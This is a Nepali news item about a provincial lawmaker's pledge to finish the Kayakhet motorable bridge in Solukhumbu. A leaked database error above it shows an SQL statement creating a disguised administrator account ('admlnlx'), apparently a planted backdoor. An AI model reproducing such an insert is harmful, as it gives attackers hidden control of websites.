WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B23kmZvQRqzRQFEvvjdRy5QUoPunID/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:12:58', '', 'admlnlx', 'admlnlx')
काठमाण्डौ। माघ मसान्तसम्म कायाखेत मोटरेबल पुल सुचारु हुने सोलुखुम्बु प्रदेश ‘ख’ संसद बुद्धि कुमार राजभन्डारिले बताए ।
आज (मंगलबार) माप्य दुधकोशी गाउँपालि ४ स्थित कोर्कुमा निर्माणाधिन रङगशालमा आयोजित राष्ट्रपति रनिङ शिल्ड, वडा स्तरीय भलिवल, पालिका स्तरिय फुटबल र ब्याट्मिन्टन प्रतियिगिताको उत्घाटन कार्यक्रमलाई सम्बोधन गर्दै राजभण्डारिले सो कुरा बताएको हो ।
सघिय संसद हेम कुमार राई ‘सूरवीर’ र सोलुखुम्बु प्रदेश ‘ख’ संसद बुद्धि कुमार राजभण्डारीको संससदकोश र गाउपालिकाको सम्युक्त लगानिमा निर्मानाधिन मोटरेबल पुल केही प्राबिधिक कारण रोकिए पनि अब आफ्नो संसदकोशबाट ७० लाख थप गरेर बाकी रहेको काम सन्चालनमा ल्याउने राभण्डारीले बताए ।